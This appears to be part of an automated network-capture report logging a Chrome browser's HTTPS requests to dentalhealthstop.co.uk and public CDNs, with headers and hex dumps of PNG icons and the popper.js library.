                                                                                                                                      date: Wed, 24 Apr 2024 10:13:27 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:13:27 UTC902INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 e1 00 00 00 e2 08 06 00 00 00 b8 27 a0 d4 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 19 5e 49 44 41 54 78 da ec 9d 7d 70 55 e5 9d c7 9f 4b 78 0d 2f 4d 09 2f 0a 12 22 be 10 a9 68 7c 1d 58 b4 40 c5 dd 95 95 01 66 77 ff 40 c7 b5 d1 ae ce 74 ac 2d 4b c7 e9 74 ec 08 e3 b6 63 77 c7 55 d7 d6 19 33 2a 38 5b a4 75 77 35 54 8a b0 2e 25 20 54 0b 8b 06 50 83 11 30 01 13 20 e4 86 c0 25 b9 dc 84 4b f6 fc 72 cf 91 9b c3 bd b9 f7 3e 2f e7 3c cf 39 df ef cc 99 1b 12 ce 7d 39 39 9f 7c 7f 2f cf 4b 84 41 c6 a8 6a 61 ef 3c eb e1 41 eb 58 62 1d 25 89 ee 28 4b 5e 48 d0 8f 1a ad a3 c6 3a 5e f8 dd 1f 27 37 e2 4a 99 a5 08 2e 81 11 f0 95 8c 29 61 ab cf
                                                                                                                                      Data Ascii: PNGIHDR'tEXtSoftwareAdobe ImageReadyqe<^IDATx}pUKx/M/"h|X@fw@t-KtcwU3*8[uw5T.% TP0 %Kr>/<9}99|/KAja<AXb%(K^H:^'7J.)a
                                                                                                                                      2024-04-24 10:13:27 UTC5686INData Raw: 22 01 85 8d 20 a3 e2 c9 3c 2b b4 9c 6a 85 96 e5 3a 01 97 2e 72 bc bb 97 f4 6f 3d a8 82 d0 c9 15 a9 68 43 c5 1b 4d 45 10 d6 95 8e 2f aa 8b 9e 4c 36 d9 e1 6c 63 90 73 cb 88 c7 50 08 69 52 19 2b 6f 39 72 49 9e 76 63 da 73 cf 33 e9 e2 53 cb 61 d9 3f 66 ae 7c aa 82 d0 d1 21 2b 34 ad 59 cb fa 1a fd 06 a9 c3 86 92 7d b3 b4 a8 f1 54 34 d9 ef dd 4f bb 76 48 dd e1 86 1e 19 4e ea 29 f4 11 85 e0 39 53 77 7e c8 3c 2c e9 9b a0 8a 99 a9 bc af 90 d0 53 36 84 8e 76 bf 9f 0a 51 3d 18 6d 63 9a 08 42 4f 86 ea 45 14 01 98 f7 b2 7d 61 12 39 1e 39 9f bb e9 ee 27 84 4e 88 4a f9 e2 f6 4d 5a e5 8b ba 48 f9 72 91 11 00 e8 0d 7c 94 f3 cd 59 20 f7 79 65 41 08 18 fd 05 31 22 19 40 02 ef 4b 00 78 31 ec a4 96 83 2c e7 53 0d 61 3a 8c 54 b8 41 98 da 4f d4 52 99 6f 02 84 2b 99 c4 e5 1b 4c
                                                                                                                                      Data Ascii: " <+j:.ro=hCME/L6lcsPiR+o9rIvcs3Sa?f|!+4Y}T4OvHN)9Sw~<,S6vQ=mcBOE}a99'NJMZHr|Y yeA1"@Kx1,Sa:TAORo+L


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      48192.168.2.164976791.238.164.1764437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:27 UTC643OUTGET /wp-content/themes/dentalhealthstop/images/dhs-icon.png HTTP/1.1
                                                                                                                                      Host: dentalhealthstop.co.uk
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                      Referer: https://dentalhealthstop.co.uk/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:13:28 UTC466INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: public, max-age=604800
                                                                                                                                      expires: Wed, 01 May 2024 10:13:27 GMT
                                                                                                                                      content-type: image/png
                                                                                                                                      last-modified: Fri, 14 Feb 2020 06:32:12 GMT
                                                                                                                                      accept-ranges: bytes
                                                                                                                                      content-length: 1126
                                                                                                                                      date: Wed, 24 Apr 2024 10:13:27 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:13:28 UTC902INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 3c 00 00 00 3c 08 06 00 00 00 3a fc d9 72 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 04 08 49 44 41 54 78 da d4 5b eb 91 da 30 10 f6 31 f7 9b f8 2a 88 3b c0 a9 00 a7 82 90 0a 0e 57 40 52 01 50 c1 71 15 00 15 c4 54 70 a6 82 98 0a ce a9 20 3e 1a 48 56 99 f5 8d a2 d1 5b b2 2c 34 a3 c1 83 8d a4 cf bb df be 24 ee 12 c3 76 bd 5e 53 f8 58 42 5f 41 cf 98 db 1d f4 0a fa 76 3a 9d b6 49 84 ed ce 02 ec 0b f4 5c e3 f1 1d 02 ef 6e 19 30 01 5b 18 fc 84 80 fd 0e a0 0f 2e 8b c4 17 fd fe 92 61 bc 7a 70 c0 30 e9 06 3e d6 96 f3 10 f5 de 12 75 d7 95 38 cc 47 5e ec 23 f4 05 f4 d4 17 75 4c 00 bf 72 38 4b 37 22 c5 23 82 cb a8 3e a7 ae 49 23 d2 39 c1
                                                                                                                                      Data Ascii: PNGIHDR<<:rtEXtSoftwareAdobe ImageReadyqe<IDATx[01*;W@RPqTp >HV[,4$v^SXB_Av:I\n0[.azp0>u8G^#uLr8K7"#>I#9
                                                                                                                                      2024-04-24 10:13:28 UTC224INData Raw: 9a b4 f8 18 b3 d1 4a 18 7f ca b6 7e 97 e0 59 73 98 37 81 14 1b 89 ba 07 05 fc 41 23 cb 31 c9 70 5a 01 e0 2e 16 09 67 12 fe 66 78 df a4 1c d3 f8 e0 e9 90 80 2f 92 7b 0b 43 75 ee 37 e9 12 9d 2a 48 8c 46 6b 8e 71 73 6b f8 bb 9a e3 73 1b c6 26 44 09 38 d7 f0 bd 5a fe dc e7 a9 fa 41 b6 5a 90 bf a9 e5 49 f8 8b a0 78 10 17 60 86 77 79 e2 50 3b 56 24 29 e3 01 66 8e 31 15 cc 02 6d cb 31 3b c9 56 ec 39 06 0e 6f 39 39 6f 65 73 68 54 c2 d7 c2 67 4e ec 23 66 7e 21 27 e6 7d 04 f7 82 f1 7f e2 7f 2e a2 71 4b 25 5a d7 f5 00 60 33 a4 48 99 c4 d4 88 d1 c2 ad 93 cc f3 b8 3f f0 e4 6c 7c 0d 41 2f 3d 8e b7 f4 0d f6 af 00 03 00 8b b1 a6 5d 0a 9f 10 b4 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                      Data Ascii: J~Ys7A#1pZ.gfx/{Cu7*HFkqsks&D8ZAZIx`wyP;V$)f1m1;V9o99oeshTgN#f~!'}.qK%Z`3H?l|A/=]IENDB`


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      49192.168.2.1649771104.17.25.144437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:27 UTC607OUTGET /ajax/libs/popper.js/1.11.0/umd/popper.min.js HTTP/1.1
                                                                                                                                      Host: cdnjs.cloudflare.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      Origin: https://dentalhealthstop.co.uk
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                      Referer: https://dentalhealthstop.co.uk/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:13:27 UTC948INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 24 Apr 2024 10:13:27 GMT
                                                                                                                                      Content-Type: application/javascript; charset=utf-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                      Cache-Control: public, max-age=30672000
                                                                                                                                      ETag: W/"5eb03fa9-4a59"
                                                                                                                                      Last-Modified: Mon, 04 May 2020 16:15:37 GMT
                                                                                                                                      cf-cdnjs-via: cfworker/kv
                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                      Timing-Allow-Origin: *
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      CF-Cache-Status: MISS
                                                                                                                                      Expires: Mon, 14 Apr 2025 10:13:27 GMT
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L2zNf40D94%2BHWniwSYanqCEgFRaJDNepo1vFxiMWlzrxAkyoNJOlS6vydHcAYvtQEdNezqTculpb5XhCH6RRnSmxfqcaf%2BOyeJebh3KfJaLg82AFEBhJC0Uah%2Bc0LtKpp6TvbJ%2F7"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Strict-Transport-Security: max-age=15780000
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 879552207c3009fd-LAS
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      2024-04-24 10:13:27 UTC421INData Raw: 34 61 35 39 0d 0a 2f 2a 0a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 46 65 64 65 72 69 63 6f 20 5a 69 76 6f 6c 6f 20 32 30 31 37 0a 20 44 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 28 6c 69 63 65 6e 73 65 20 74 65 72 6d 73 20 61 72 65 20 61 74 20 68 74 74 70 3a 2f 2f 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 4d 49 54 29 2e 0a 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 27 6f 62 6a 65 63 74 27 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 27 75 6e 64 65 66 69 6e 65 64 27 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 27 66 75 6e 63 74 69 6f 6e 27 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26
                                                                                                                                      Data Ascii: 4a59/* Copyright (C) Federico Zivolo 2017 Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT). */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&
                                                                                                                                      2024-04-24 10:13:27 UTC1369INData Raw: 72 65 74 75 72 6e 5b 5d 3b 76 61 72 20 6f 3d 77 69 6e 64 6f 77 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 65 2c 6e 75 6c 6c 29 3b 72 65 74 75 72 6e 20 74 3f 6f 5b 74 5d 3a 6f 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 72 65 74 75 72 6e 27 48 54 4d 4c 27 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 3f 65 3a 65 2e 70 61 72 65 6e 74 4e 6f 64 65 7c 7c 65 2e 68 6f 73 74 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 69 66 28 21 65 7c 7c 2d 31 21 3d 3d 5b 27 48 54 4d 4c 27 2c 27 42 4f 44 59 27 2c 27 23 64 6f 63 75 6d 65 6e 74 27 5d 2e 69 6e 64 65 78 4f 66 28 65 2e 6e 6f 64 65 4e 61 6d 65 29 29 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3b 76 61 72 20 69 3d 74 28 65 29 2c 72 3d 69 2e 6f 76 65 72 66 6c 6f 77 2c 70 3d 69
                                                                                                                                      Data Ascii: return[];var o=window.getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e||-1!==['HTML','BODY','#document'].indexOf(e.nodeName))return window.document.body;var i=t(e),r=i.overflow,p=i
                                                                                                                                      2024-04-24 10:13:27 UTC1369INData Raw: 3d 61 28 74 2c 27 74 6f 70 27 29 2c 6e 3d 61 28 74 2c 27 6c 65 66 74 27 29 2c 72 3d 6f 3f 2d 31 3a 31 3b 72 65 74 75 72 6e 20 65 2e 74 6f 70 2b 3d 69 2a 72 2c 65 2e 62 6f 74 74 6f 6d 2b 3d 69 2a 72 2c 65 2e 6c 65 66 74 2b 3d 6e 2a 72 2c 65 2e 72 69 67 68 74 2b 3d 6e 2a 72 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 65 2c 74 29 7b 76 61 72 20 6f 3d 27 78 27 3d 3d 3d 74 3f 27 4c 65 66 74 27 3a 27 54 6f 70 27 2c 69 3d 27 4c 65 66 74 27 3d 3d 6f 3f 27 52 69 67 68 74 27 3a 27 42 6f 74 74 6f 6d 27 3b 72 65 74 75 72 6e 2b 65 5b 27 62 6f 72 64 65 72 27 2b 6f 2b 27 57 69 64 74 68 27 5d 2e 73 70 6c 69 74 28 27 70 78 27 29 5b 30 5d 2b 20 2b 65 5b 27 62 6f 72 64 65 72 27 2b 69 2b 27 57 69 64 74 68 27 5d 2e 73 70 6c 69 74 28 27 70 78 27 29 5b 30 5d 7d 66 75 6e 63 74 69
                                                                                                                                      Data Ascii: =a(t,'top'),n=a(t,'left'),r=o?-1:1;return e.top+=i*r,e.bottom+=i*r,e.left+=n*r,e.right+=n*r,e}function l(e,t){var o='x'===t?'Left':'Top',i='Left'==o?'Right':'Bottom';return+e['border'+o+'Width'].split('px')[0]+ +e['border'+i+'Width'].split('px')[0]}functi
                                                                                                                                      2024-04-24 10:13:27 UTC1369INData Raw: 29 3b 69 66 28 68 2e 6d 61 72 67 69 6e 54 6f 70 3d 30 2c 68 2e 6d 61 72 67 69 6e 4c 65 66 74 3d 30 2c 21 69 26 26 72 29 7b 76 61 72 20 75 3d 2b 61 2e 6d 61 72 67 69 6e 54 6f 70 2e 73 70 6c 69 74 28 27 70 78 27 29 5b 30 5d 2c 62 3d 2b 61 2e 6d 61 72 67 69 6e 4c 65 66 74 2e 73 70 6c 69 74 28 27 70 78 27 29 5b 30 5d 3b 68 2e 74 6f 70 2d 3d 6c 2d 75 2c 68 2e 62 6f 74 74 6f 6d 2d 3d 6c 2d 75 2c 68 2e 6c 65 66 74 2d 3d 6d 2d 62 2c 68 2e 72 69 67 68 74 2d 3d 6d 2d 62 2c 68 2e 6d 61 72 67 69 6e 54 6f 70 3d 75 2c 68 2e 6d 61 72 67 69 6e 4c 65 66 74 3d 62 7d 72 65 74 75 72 6e 28 69 3f 6f 2e 63 6f 6e 74 61 69 6e 73 28 64 29 3a 6f 3d 3d 3d 64 26 26 27 42 4f 44 59 27 21 3d 3d 64 2e 6e 6f 64 65 4e 61 6d 65 29 26 26 28 68 3d 66 28 68 2c 6f 29 29 2c 68 7d 66 75 6e 63 74
                                                                                                                                      Data Ascii: );if(h.marginTop=0,h.marginLeft=0,!i&&r){var u=+a.marginTop.split('px')[0],b=+a.marginLeft.split('px')[0];h.top-=l-u,h.bottom-=l-u,h.left-=m-b,h.right-=m-b,h.marginTop=u,h.marginLeft=b}return(i?o.contains(d):o===d&&'BODY'!==d.nodeName)&&(h=f(h,o)),h}funct
                                                                                                                                      2024-04-24 10:13:27 UTC1369INData Raw: 74 3a 7b 77 69 64 74 68 3a 74 2e 6c 65 66 74 2d 70 2e 6c 65 66 74 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 7d 2c 64 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 73 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 73 65 28 7b 6b 65 79 3a 65 7d 2c 73 5b 65 5d 2c 7b 61 72 65 61 3a 76 28 73 5b 65 5d 29 7d 29 7d 29 2e 73 6f 72 74 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 2e 61 72 65 61 2d 65 2e 61 72 65 61 7d 29 2c 61 3d 64 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 77 69 64 74 68 2c 69 3d 65 2e 68 65 69 67 68 74 3b 72 65 74 75 72 6e 20 74 3e 3d 6f 2e 63 6c 69 65 6e 74 57 69 64 74 68 26 26 69 3e 3d 6f 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 7d 29 2c 66 3d 30 3c 61
                                                                                                                                      Data Ascii: t:{width:t.left-p.left,height:p.height}},d=Object.keys(s).map(function(e){return se({key:e},s[e],{area:v(s[e])})}).sort(function(e,t){return t.area-e.area}),a=d.filter(function(e){var t=e.width,i=e.height;return t>=o.clientWidth&&i>=o.clientHeight}),f=0<a
                                                                                                                                      2024-04-24 10:13:27 UTC1369INData Raw: 27 29 3b 76 61 72 20 69 3d 74 2e 66 75 6e 63 74 69 6f 6e 7c 7c 74 2e 66 6e 3b 74 2e 65 6e 61 62 6c 65 64 26 26 65 28 69 29 26 26 28 6f 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 3d 63 28 6f 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 29 2c 6f 2e 6f 66 66 73 65 74 73 2e 72 65 66 65 72 65 6e 63 65 3d 63 28 6f 2e 6f 66 66 73 65 74 73 2e 72 65 66 65 72 65 6e 63 65 29 2c 6f 3d 69 28 6f 2c 74 29 29 7d 29 2c 6f 7d 66 75 6e 63 74 69 6f 6e 20 6b 28 29 7b 69 66 28 21 74 68 69 73 2e 73 74 61 74 65 2e 69 73 44 65 73 74 72 6f 79 65 64 29 7b 76 61 72 20 65 3d 7b 69 6e 73 74 61 6e 63 65 3a 74 68 69 73 2c 73 74 79 6c 65 73 3a 7b 7d 2c 61 74 74 72 69 62 75 74 65 73 3a 7b 7d 2c 66 6c 69 70 70 65 64 3a 21 31 2c 6f 66 66 73 65 74 73 3a 7b 7d 7d 3b 65 2e 6f 66 66 73 65 74
                                                                                                                                      Data Ascii: ');var i=t.function||t.fn;t.enabled&&e(i)&&(o.offsets.popper=c(o.offsets.popper),o.offsets.reference=c(o.offsets.reference),o=i(o,t))}),o}function k(){if(!this.state.isDestroyed){var e={instance:this,styles:{},attributes:{},flipped:!1,offsets:{}};e.offset
                                                                                                                                      2024-04-24 10:13:27 UTC1369INData Raw: 65 72 29 2c 74 68 69 73 7d 66 75 6e 63 74 69 6f 6e 20 48 28 65 2c 74 2c 6f 2c 69 29 7b 76 61 72 20 72 3d 27 42 4f 44 59 27 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 2c 70 3d 72 3f 77 69 6e 64 6f 77 3a 65 3b 70 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 74 2c 6f 2c 7b 70 61 73 73 69 76 65 3a 21 30 7d 29 2c 72 7c 7c 48 28 6e 28 70 2e 70 61 72 65 6e 74 4e 6f 64 65 29 2c 74 2c 6f 2c 69 29 2c 69 2e 70 75 73 68 28 70 29 7d 66 75 6e 63 74 69 6f 6e 20 50 28 65 2c 74 2c 6f 2c 69 29 7b 6f 2e 75 70 64 61 74 65 42 6f 75 6e 64 3d 69 2c 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 72 65 73 69 7a 65 27 2c 6f 2e 75 70 64 61 74 65 42 6f 75 6e 64 2c 7b 70 61 73 73 69 76 65 3a 21 30 7d 29 3b 76 61 72 20 72 3d 6e 28 65 29 3b 72 65 74 75
                                                                                                                                      Data Ascii: er),this}function H(e,t,o,i){var r='BODY'===e.nodeName,p=r?window:e;p.addEventListener(t,o,{passive:!0}),r||H(n(p.parentNode),t,o,i),i.push(p)}function P(e,t,o,i){o.updateBound=i,window.addEventListener('resize',o.updateBound,{passive:!0});var r=n(e);retu
                                                                                                                                      2024-04-24 10:13:27 UTC1369INData Raw: 71 75 69 72 65 64 20 62 79 20 27 2b 72 2b 27 20 6d 6f 64 69 66 69 65 72 20 69 6e 20 6f 72 64 65 72 20 74 6f 20 77 6f 72 6b 2c 20 62 65 20 73 75 72 65 20 74 6f 20 69 6e 63 6c 75 64 65 20 69 74 20 62 65 66 6f 72 65 20 27 2b 72 2b 27 21 27 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6a 28 65 29 7b 72 65 74 75 72 6e 27 65 6e 64 27 3d 3d 3d 65 3f 27 73 74 61 72 74 27 3a 27 73 74 61 72 74 27 3d 3d 3d 65 3f 27 65 6e 64 27 3a 65 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 65 29 7b 76 61 72 20 74 3d 31 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 31 5d 2c 6f 3d 61 65 2e 69 6e 64 65 78 4f 66 28 65 29 2c 69 3d 61 65 2e 73 6c 69 63 65 28 6f 2b 31 29
                                                                                                                                      Data Ascii: quired by '+r+' modifier in order to work, be sure to include it before '+r+'!')}return n}function j(e){return'end'===e?'start':'start'===e?'end':e}function K(e){var t=1<arguments.length&&void 0!==arguments[1]&&arguments[1],o=ae.indexOf(e),i=ae.slice(o+1)
                                                                                                                                      2024-04-24 10:13:27 UTC1369INData Raw: 74 2c 6f 29 7d 29 7d 29 2c 61 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 69 29 7b 52 28 6f 29 26 26 28 6e 5b 74 5d 2b 3d 6f 2a 28 27 2d 27 3d 3d 3d 65 5b 69 2d 31 5d 3f 2d 31 3a 31 29 29 7d 29 7d 29 2c 6e 7d 66 6f 72 28 76 61 72 20 7a 3d 4d 61 74 68 2e 6d 69 6e 2c 56 3d 4d 61 74 68 2e 66 6c 6f 6f 72 2c 5f 3d 4d 61 74 68 2e 6d 61 78 2c 58 3d 5b 27 6e 61 74 69 76 65 20 63 6f 64 65 27 2c 27 5b 6f 62 6a 65 63 74 20 4d 75 74 61 74 69 6f 6e 4f 62 73 65 72 76 65 72 43 6f 6e 73 74 72 75 63 74 6f 72 5d 27 5d 2c 51 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 58 2e 73 6f 6d 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 2d 31 3c 28 65 7c 7c 27 27 29
                                                                                                                                      Data Ascii: t,o)})}),a.forEach(function(e,t){e.forEach(function(o,i){R(o)&&(n[t]+=o*('-'===e[i-1]?-1:1))})}),n}for(var z=Math.min,V=Math.floor,_=Math.max,X=['native code','[object MutationObserverConstructor]'],Q=function(e){return X.some(function(t){return-1<(e||'')
                                                                                                                                      2024-04-24 10:13:27 UTC1369INData Raw: 69 6e 20 74 3d 61 72 67 75 6d 65 6e 74 73 5b 6f 5d 2c 74 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 74 2c 69 29 26 26 28 65 5b 69 5d 3d 74 5b 69 5d 29 3b 72 65 74 75 72 6e 20 65 7d 2c 64 65 3d 5b 27 61 75 74 6f 2d 73 74 61 72 74 27 2c 27 61 75 74 6f 27 2c 27 61 75 74 6f 2d 65 6e 64 27 2c 27 74 6f 70 2d 73 74 61 72 74 27 2c 27 74 6f 70 27 2c 27 74 6f 70 2d 65 6e 64 27 2c 27 72 69 67 68 74 2d 73 74 61 72 74 27 2c 27 72 69 67 68 74 27 2c 27 72 69 67 68 74 2d 65 6e 64 27 2c 27 62 6f 74 74 6f 6d 2d 65 6e 64 27 2c 27 62 6f 74 74 6f 6d 27 2c 27 62 6f 74 74 6f 6d 2d 73 74 61 72 74 27 2c 27 6c 65 66 74 2d 65 6e 64 27 2c 27 6c 65 66 74 27 2c 27 6c 65 66 74 2d 73 74 61 72 74 27 5d 2c 61 65 3d 64
                                                                                                                                      Data Ascii: in t=arguments[o],t)Object.prototype.hasOwnProperty.call(t,i)&&(e[i]=t[i]);return e},de=['auto-start','auto','auto-end','top-start','top','top-end','right-start','right','right-end','bottom-end','bottom','bottom-start','left-end','left','left-start'],ae=d


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      50192.168.2.1649772104.18.11.2074437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:13:27 UTC606OUTGET /bootstrap/4.0.0-beta/js/bootstrap.min.js HTTP/1.1
                                                                                                                                      Host: maxcdn.bootstrapcdn.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      Origin: https://dentalhealthstop.co.uk
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                      Referer: https://dentalhealthstop.co.uk/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:13:27 UTC933INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 24 Apr 2024 10:13:27 GMT
                                                                                                                                      Content-Type: application/javascript; charset=utf-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      CDN-PullZone: 252412
                                                                                                                                      CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                                                                                                                                      CDN-RequestCountryCode: US
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                      Cache-Control: public, max-age=31919000
                                                                                                                                      ETag: W/"baaadea4492b059f284187d75af46063"
                                                                                                                                      Last-Modified: Mon, 25 Jan 2021 22:04:04 GMT
                                                                                                                                      CDN-CachedAt: 03/18/2024 12:48:07
                                                                                                                                      CDN-ProxyVer: 1.04
                                                                                                                                      CDN-RequestPullCode: 200
                                                                                                                                      CDN-RequestPullSuccess: True
                                                                                                                                      CDN-EdgeStorageId: 1108
                                                                                                                                      timing-allow-origin: *
                                                                                                                                      cross-origin-resource-policy: cross-origin
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      CDN-Status: 200
                                                                                                                                      CDN-RequestId: a6198f19b9ef50bdf4b3a3279e357cf0
                                                                                                                                      CDN-Cache: HIT
                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8795522079de0adb-LAS
                                                                                                                                      alt-svc: h3=":443"; ma=86400
